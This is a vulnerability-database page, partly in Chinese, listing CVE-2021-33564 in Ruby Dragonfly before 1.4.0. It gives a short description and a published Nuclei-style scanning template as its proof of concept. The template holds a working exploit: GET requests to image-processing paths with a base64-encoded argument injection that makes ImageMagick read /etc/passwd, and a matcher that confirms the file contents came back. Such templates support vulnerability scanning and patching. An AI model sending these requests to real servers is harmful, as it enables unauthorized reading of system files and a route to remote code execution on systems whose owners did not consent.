CVE-2021-33564: Ruby Dragonfly <1.4.0 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Ruby Dragonfly | POC: 已公开

漏洞描述

Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.

PoC代码[已公开]

id: CVE-2021-33564

info:
  name: Ruby Dragonfly <1.4.0 - Remote Code Execution
  author: 0xsapra
  severity: critical
  description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability.
  reference:
    - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
    - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0
    - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5
    - https://github.com/mlr0p/CVE-2021-33564
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33564
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33564
    cwe-id: CWE-88
    epss-score: 0.91228
    epss-percentile: 0.99639
    cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*
  metadata:
    max-request: 2
    vendor: dragonfly_project
    product: dragonfly
    framework: ruby
  tags: cve2021,cve,rce,ruby,injection,dragonfly_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
      - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402205f11be958b14c49cd5dc7cae04fdb88b90b923dff493afe9c6378f4430803635022005fb48542517b071d5090a2e9be34d3bc500ce2837f491785653d12cef502403:922c64590222798bb761d5b6d8e72950

相关漏洞推荐